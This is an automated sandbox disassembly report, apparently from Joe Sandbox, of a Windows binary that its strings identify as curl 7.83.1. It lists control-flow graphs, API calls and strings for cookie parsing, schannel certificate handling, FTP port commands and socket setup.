                                    control_flow_graph 769 e0ce40-e0ce67 _strdup setlocale 771 e0ce92-e0ce96 call e0dc15 769->771 772 e0ce69-e0ce6b 769->772 779 e0ce9b-e0ce9f 771->779 773 e0ce6d-e0ce80 strncmp 772->773 774 e0cece-e0cee4 call e08599 772->774 777 e0ce82-e0ce90 call e1251e 773->777 778 e0cebf-e0cec6 free 773->778 790 e0cef5-e0cef8 774->790 791 e0cee6-e0cee9 call e089a1 774->791 777->771 777->778 784 e0cec7-e0cec9 778->784 782 e0cea1-e0ceaa 779->782 783 e0cebb-e0cebd 779->783 782->783 789 e0ceac-e0ceba call e09159 782->789 783->778 783->784 785 e0cecb 784->785 786 e0ceee-e0cef4 784->786 785->774 789->783 790->786 794 e0cefa-e0cefd 790->794 791->786 796 e0cf06-e0cf09 794->796 797 e0ceff-e0cf04 call e08a54 794->797 799 e0cf12-e0cf15 796->799 800 e0cf0b-e0cf10 call e08b82 796->800 797->786 801 e0cf17-e0cf1a 799->801 802 e0cf1c-e0cf28 799->802 800->786 801->786 802->786
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E0CE46
                                    • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000,00E574AB,?,00000000,?,?,?,00E0901E,?), ref: 00E0CE59
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00E60780,00000002), ref: 00E0CE75
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E0CEC0
                                    Strings
                                    Similarity
                                    • API ID: _strdupfreesetlocalestrncmp
                                    • String ID: --disable$z

                                    Control-flow Graph

                                    APIs
                                    • _mbscmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,--dump-module-paths), ref: 00E08F9A
                                    • QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0(00E6FAF8), ref: 00E08FF7
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E0902C
                                      • Part of subcall function 00E0310D: CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0(00000008,00000000), ref: 00E03148
                                      • Part of subcall function 00E0310D: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E03155
                                      • Part of subcall function 00E0310D: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00E0316F
                                      • Part of subcall function 00E120F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,00E08A7A,curl 7.83.1 (Windows) %s,00000000), ref: 00E12101
                                    Strings
                                    Similarity
                                    • API ID: CloseCreateErrorFrequencyHandleLastPerformanceQuerySnapshotToolhelp32__acrt_iob_func_mbscmpfflush
                                    • String ID: %s$--dump-module-paths$YR{

                                    Control-flow Graph

                                    control_flow_graph 829 e1d282-e1d2ad WSAStartup 830 e1d325-e1d327 829->830 831 e1d2af-e1d2b4 829->831 832 e1d328-e1d339 call e50ca6 830->832 833 e1d2b6-e1d2bb 831->833 834 e1d31f WSACleanup 831->834 833->834 836 e1d2bd-e1d2c4 call e34e72 833->836 834->830 836->832 840 e1d2c6-e1d2cb call e1d33a 836->840 842 e1d2d0-e1d2d7 840->842 843 e1d2f6-e1d31d call e10b38 QueryPerformanceFrequency 842->843 844 e1d2d9-e1d2f0 GetProcAddress 842->844 843->832 844->843
                                    APIs
                                    • WSAStartup.WS2_32(00000202,B73A4C3C), ref: 00E1D2A5
                                    • WSACleanup.WS2_32 ref: 00E1D31F
                                      • Part of subcall function 00E34E72: GetProcAddress.KERNELBASE(00000000,InitSecurityInterfaceA,?,?,00E1D2C2), ref: 00E34EB0
                                      • Part of subcall function 00E1D33A: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D34B
                                      • Part of subcall function 00E1D33A: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D363
                                      • Part of subcall function 00E1D33A: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,00E57348,?,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D374
                                      • Part of subcall function 00E1D33A: LoadLibraryExA.KERNELBASE(?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D3B6
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,if_nametoindex), ref: 00E1D2DF
                                    • QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0(00E6FAE8), ref: 00E1D315
                                    Strings
                                    Similarity
                                    • API ID: AddressProc$CleanupFrequencyHandleLibraryLoadModulePerformanceQueryStartup_mbspbrk
                                    • String ID: if_nametoindex$iphlpapi.dll

                                    Control-flow Graph

                                    control_flow_graph 847 e036ba-e036db 848 e036dc-e036de 847->848 849 e036e0-e036f8 call e120e6 848->849 850 e036fa-e03706 call e120e6 848->850 855 e03709-e0370d 849->855 850->855 856 e03727-e0372a 855->856 857 e0370f-e03712 call e10b16 855->857 859 e03753 856->859 860 e0372c-e03735 856->860 861 e03717-e0371f 857->861 862 e03755-e03759 859->862 860->848 863 e03721-e03726 call e12920 861->863 864 e03737-e03751 _strdup _close call e12920 861->864 863->856 864->862
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E03737
                                    • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E03742
                                    Strings
                                    Similarity
                                    • API ID: _close_strdup
                                    • String ID: %s\%c%s$%s\%s$._

                                    Control-flow Graph

                                    control_flow_graph 869 e031fa-e0320a GetStdHandle 870 e03278 869->870 871 e0320c-e0321a GetConsoleMode 869->871 871->870 872 e0321c-e03223 871->872 872->870 873 e03225-e03241 SetConsoleCtrlHandler 872->873 874 e03243-e0325a SetConsoleMode 873->874 875 e03276-e03277 873->875 876 e03269-e03274 SetConsoleCtrlHandler 874->876 877 e0325c-e03267 call e510ee 874->877 875->870 876->875 877->875
                                    APIs
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00E09002), ref: 00E031FC
                                    • GetConsoleMode.KERNELBASE(00000000,00E6F568), ref: 00E03212
                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(Function_000031E0,00000001,?), ref: 00E03239
                                    • SetConsoleMode.KERNELBASE(00000003), ref: 00E03252
                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(Function_000031E0,00000000), ref: 00E0326C
                                    Similarity
                                    • API ID: Console$CtrlHandlerMode$Handle
                                    • String ID:

                                    Control-flow Graph

                                    control_flow_graph 880 e01e09-e01e30 call e520c0 883 e01e32-e01e3b 880->883 884 e01e3e-e01e4d call e12677 880->884 883->884 887 e01e94-e01e99 884->887 888 e01e4f-e01e64 strtol 884->888 889 e01ed8-e01ee0 887->889 890 e01e9b-e01ea6 GetStdHandle 887->890 891 e01e66-e01e6b 888->891 892 e01e8d-e01e93 call e12920 888->892 896 e01ee2 889->896 897 e01ee5-e01f0c call e50ca6 889->897 894 e01ea8-e01eb5 GetConsoleScreenBufferInfo 890->894 895 e01ec9-e01ecd 890->895 898 e01e6e-e01e73 891->898 892->887 894->895 900 e01eb7-e01ec4 894->900 895->889 901 e01ecf-e01ed6 895->901 896->897 898->898 903 e01e75-e01e7e 898->903 900->895 906 e01ec6 900->906 901->897 903->892 905 e01e80-e01e88 903->905 905->892 907 e01e8a 905->907 906->895 907->892
                                    APIs
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,0000000A,?,?,?,?), ref: 00E01E56
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F4,?,?,?), ref: 00E01E9D
                                    • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?), ref: 00E01EAD
                                    Strings
                                    Similarity
                                    • API ID: BufferConsoleHandleInfoScreenstrtol
                                    • String ID: COLUMNS

                                    Control-flow Graph

                                    control_flow_graph 908 e34e72-e34e7a 909 e34ed4-e34ed7 908->909 910 e34e7c-e34ea8 call e10b38 call e1d33a 908->910 915 e34eaa-e34eba GetProcAddress 910->915 916 e34ecf-e34ed3 910->916 915->916 917 e34ebc-e34ecd 915->917 917->909 917->916
                                    APIs
                                      • Part of subcall function 00E10B38: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 00E10B6D
                                      • Part of subcall function 00E10B38: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E10B74
                                      • Part of subcall function 00E1D33A: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D34B
                                      • Part of subcall function 00E1D33A: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D363
                                      • Part of subcall function 00E1D33A: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,00E57348,?,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D374
                                      • Part of subcall function 00E1D33A: LoadLibraryExA.KERNELBASE(?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D3B6
                                    • GetProcAddress.KERNELBASE(00000000,InitSecurityInterfaceA,?,?,00E1D2C2), ref: 00E34EB0
                                    Strings
                                    Similarity
                                    • API ID: AddressProc$HandleModule$LibraryLoad_mbspbrk
                                    • String ID: InitSecurityInterfaceA$secur32.dll$security.dll

                                    Control-flow Graph

                                    control_flow_graph 920 e21cdf-e21d06 calloc * 2 922 e21d10-e21d34 calloc * 2 920->922 923 e21d08-e21d0b 920->923 926 e21d36-e21d48 free 922->926 927 e21d4a-e21d5d call e21aee 922->927 924 e21dd3-e21dd6 923->924 926->923 931 e21d98-e21dce free call e1d126 call e214fa free 927->931 932 e21d5f-e21d96 call e27f41 927->932 936 e21dcf-e21dd2 931->936 932->936 936->924
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00E12254,?,?,?,00E08B8E), ref: 00E21CFE
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E12254,?,?,?,00E08B8E), ref: 00E21D28
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E08B8E), ref: 00E21D45
                                      • Part of subcall function 00E21AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,766B1980,?,00E21D52,?,?,?,?,00E08B8E), ref: 00E21AF5
                                      • Part of subcall function 00E21AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00E21D52,?,?,?,?,00E08B8E), ref: 00E21B03
                                      • Part of subcall function 00E21AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00E21D52,?,?,?,?,00E08B8E), ref: 00E21B11
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00E08B8E), ref: 00E21DAC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E08B8E), ref: 00E21DCC
                                      • Part of subcall function 00E27F41: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E28006
                                      • Part of subcall function 00E27F41: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E28023
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$__acrt_iob_func$calloc
                                    • String ID:
                                    • API String ID: 3275786289-0

                                    Control-flow Graph (first node at e0cf30; graph rendering not preserved)
                                    APIs
                                      • Part of subcall function 00E032D3: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008), ref: 00E032F6
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E0CF70
                                    Similarity
                                    • API ID: callocmalloc
                                    • String ID: hnd = curl_easy_init();$out of memory$Q
                                    • API String ID: 1635859522-3006749264

                                    Control-flow Graph (first node at e121c0; graph rendering not preserved)
                                    APIs
                                    • FreeLibrary.KERNELBASE(00000000,?,00E08EF6), ref: 00E12208
                                    • WSACleanup.WS2_32 ref: 00E12227
                                    Similarity
                                    • API ID: CleanupFreeLibrary
                                    • String ID: xk
                                    • API String ID: 470324515-2543109834

                                    Control-flow Graph (first node at e0ca6a; graph rendering not preserved)
                                    Similarity
                                    • API ID:
                                    • String ID: no transfer performed
                                    • API String ID: 0-1612002148
                                    APIs
                                    • WSACloseEvent.WS2_32(?), ref: 00E18BC2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E18BD7
                                    Similarity
                                    • API ID: CloseEventfree
                                    • String ID:
                                    • API String ID: 126896923-0
                                    APIs
                                    • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00001000,?,00000000,00000000,00000000,?,00E0DD03,?), ref: 00E0E0C0
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E0E0FB
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrfgets
                                    • String ID:
                                    • API String ID: 4248516992-0
                                    APIs
                                      • Part of subcall function 00E5167B: GetModuleHandleW.KERNEL32(00000000,00E512E6), ref: 00E5167D
                                    • _c_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E5132F
                                    • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000007,00E6D000,00000014), ref: 00E5135E
                                    Similarity
                                    • API ID: HandleModule_c_exit_exit
                                    • String ID:
                                    • API String ID: 750871209-0
                                    APIs
                                    • socket.WS2_32(00000017,00000002,00000000), ref: 00E2E9A6
                                    • closesocket.WS2_32(00000000), ref: 00E2E9B2
                                    Similarity
                                    • API ID: closesocketsocket
                                    • String ID:
                                    • API String ID: 2760038618-0
                                    APIs
                                    • _open.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100,00000180,?,00E02077,?,00008501,00000180), ref: 00E10B2D
                                    Similarity
                                    • API ID: _open
                                    • String ID:
                                    • API String ID: 4183159743-0
                                    APIs
                                    • SetConsoleMode.KERNELBASE(00E031F4), ref: 00E031D9
                                    Similarity
                                    • API ID: ConsoleMode
                                    • String ID:
                                    • API String ID: 4145635619-0
                                    APIs
                                    • FreeLibrary.KERNELBASE(00000000,00E12221,?,00E08EF6), ref: 00E34EE2
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E17B80
                                    Similarity
                                    • API ID: malloc
                                    • String ID:
                                    • API String ID: 2803490479-0
                                    APIs
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00000000,00000000,?,00E209DF,?,00000001,0000000C,00000000,00000000,00000001), ref: 00E1FB30
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1FB5E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1FBA1
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E1FBAC
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(__Secure-,0000005F,00000009), ref: 00E1FD02
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(__Host-,?,00000007), ref: 00E1FD23
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1FE2F
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E1FE73
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E1FFC8
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E1FFE5
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E2012C
                                    • _strrchr.LIBCMT ref: 00E2013A
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2016E
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,#HttpOnly_,0000000A), ref: 00E201D0
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E201F0
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E20201
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E20610
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E206CC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E206E0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E206F4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E20708
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2071C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E20730
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E20744
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E20758
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E20778
                                      • Part of subcall function 00E1F9D3: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F9EA
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2086B
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E208DD
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00001000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E2093F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2096E
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E20992
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00001000,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00E2126F), ref: 00E20A02
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E20A14
                                    Similarity
                                    • API ID: free$___from_strstr_to_strchr$strncmp$callocfclosemalloc$__acrt_iob_func_strrchr_time64
                                    • String ID: #HttpOnly_$%4095[^;=] =%4095[^;]$%s cookie %s="%s" for domain %s, path %s, expire %I64d$=$Added$FALSE$Replaced$TRUE$WARNING: failed to open cookie file "%s"$_$_$__Host-$__Secure-$domain$expires$httponly$localhost$max-age$none$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version$|J$|J
                                    • API String ID: 2930520296-3965322472
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E43FA5
                                      • Part of subcall function 00E43BB5: _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00E43BC3
                                      • Part of subcall function 00E43BB5: _mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,CurrentUser,00000000), ref: 00E43BE1
                                      • Part of subcall function 00E43BB5: _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00E43CC8
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E58DD4), ref: 00E43FF1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E44092
                                    • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002), ref: 00E440AD
                                    • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E440CA
                                    • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000001,00000000), ref: 00E440F3
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E44109
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E44140
                                    • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000), ref: 00E44161
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4418D
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E441F4
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000008,?,00000000,00000000,00000001), ref: 00E44214
                                    • PFXImportCertStore.CRYPT32(?,00000000,00000000), ref: 00E4422D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E44244
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4427E
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E44285
                                    • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,00000000,00000000,00000000), ref: 00E442CF
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E442E3
                                    • CertCloseStore.CRYPT32(?,00000000), ref: 00E44301
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E44321
                                    • CertOpenStore.CRYPT32(00000009,00000000,00000000,?,?), ref: 00E44345
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E44355
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E44380
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E4438C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E443A6
                                    • CryptStringToBinaryA.CRYPT32(?,00000028,00000004,?,00000014), ref: 00E443D5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E443E4
                                    • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,00010000,00000014,00000000), ref: 00E44415
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E44426
                                    • CertCloseStore.CRYPT32(?), ref: 00E44456
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E44470
                                    • CertFreeCertificateContext.CRYPT32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E4449C
                                    • CertFreeCertificateContext.CRYPT32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E444EC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4452A
                                    Strings
                                    • schannel: certificate format compatibility error for %s, xrefs: 00E44039
                                    • schannel: Failed to get certificate location or file for %s, xrefs: 00E44312
                                    • schannel: Failed to import cert file %s, password is bad, xrefs: 00E44296
                                    • schannel: Failed to open cert store %x %s, last error is 0x%x, xrefs: 00E44363
                                    • schannel: Failed to read cert file %s, xrefs: 00E44123
                                    • schannel: Failed to import cert file %s, last error is 0x%x, xrefs: 00E442B0
                                    • (memory blob), xrefs: 00E4402B, 00E44038, 00E44075
                                    • schannel: Failed to get certificate from file %s, last error is 0x%x, xrefs: 00E442F0
                                    • Microsoft Unified Security Protocol Provider, xrefs: 00E444C8
                                    • Unable to set ciphers to passed via SSL_CONN_CONFIG, xrefs: 00E43F29
                                    • schannel: unable to allocate memory, xrefs: 00E44480
                                    • P12, xrefs: 00E44017
                                    • schannel: AcquireCredentialsHandle failed: %s, xrefs: 00E44506
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$Cert$Store$Certificate$ErrorLast$CloseContextFindFree_mbschrfseekmalloc$BinaryByteCharCryptImportMultiOpenStringWide_mbsnbcmp_strdupcallocfclosefopenfreadftell
                                    • String ID: (memory blob)$Microsoft Unified Security Protocol Provider$P12$Unable to set ciphers to passed via SSL_CONN_CONFIG$schannel: AcquireCredentialsHandle failed: %s$schannel: Failed to get certificate from file %s, last error is 0x%x$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%x$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %x %s, last error is 0x%x$schannel: Failed to read cert file %s$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
                                    • API String ID: 2859572553-531812395
                                    • Opcode ID: de5653140906ebf6595ed67376ba8ad82897ea59ddca61399fc53c476f70e0de
                                    • Instruction ID: 361464431af54708f87089320b89ee97849e01fcf9ed5b5f6ef0a6ef5f3d7593
                                    • Opcode Fuzzy Hash: de5653140906ebf6595ed67376ba8ad82897ea59ddca61399fc53c476f70e0de
                                    • Instruction Fuzzy Hash: 2602D5B1B4072A9FDB249F61EC84BEEB7B8EF04715F1050A9E909B7291DB705E848F50
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3A997
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E3A9B5
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 00E3AA1F
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E3AA33
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,00000000,0000000A), ref: 00E3AA4B
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E3AA5A
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,00000000,0000000A), ref: 00E3AA6B
                                    • getsockname.WS2_32(?,?,?), ref: 00E3AB16
                                    • WSAGetLastError.WS2_32 ref: 00E3AB21
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3ABEA
                                    • WSAGetLastError.WS2_32 ref: 00E3AC18
                                    • htons.WS2_32(?), ref: 00E3AC95
                                    • bind.WS2_32(000000FF,?,00000080), ref: 00E3ACB3
                                    • WSAGetLastError.WS2_32 ref: 00E3ACC1
                                    • getsockname.WS2_32(?,?,00000080), ref: 00E3AD1D
                                    • WSAGetLastError.WS2_32 ref: 00E3AD53
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A0C3
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0CB
                                      • Part of subcall function 00E1A0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0DD
                                      • Part of subcall function 00E1A0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 00E1A0EC
                                      • Part of subcall function 00E1A0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 00E1A0F6
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A142
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A15C
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A173
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A180
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A188
                                      • Part of subcall function 00E1A0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A193
                                      • Part of subcall function 00E1F3FC: closesocket.WS2_32(00E21EF4), ref: 00E1F433
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3B090
                                    Similarity
                                    • API ID: ErrorLast$___from_strstr_to_strchr_errno$_strrchrfreegetsocknamestrncpystrtoul$__sys_errlist__sys_nerrbindcallocclosesockethtons
                                    • String ID: %s %s$%s |%d|%s|%hu|$,$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                    • API String ID: 2930231303-3103743990
                                    • Opcode ID: bb8b58bb6cb76a35f0066a0de32f126fb85f3ff02bb2c1c69c2123eb2ad2e177
                                    • Instruction ID: 98ae4584b0a1e7bf03ecece881316f111f5f088aee6fe5bf15cb1e88dcc2bfdb
                                    • Opcode Fuzzy Hash: bb8b58bb6cb76a35f0066a0de32f126fb85f3ff02bb2c1c69c2123eb2ad2e177
                                    • Instruction Fuzzy Hash: 86220871A002189FDB249F24DC99BFE7BB6AB84304F0851B9E849B7181DE724ED4CF61
                                    APIs
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(if!,?,00000003), ref: 00E1DF9A
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(host!,?,00000005), ref: 00E1DFC9
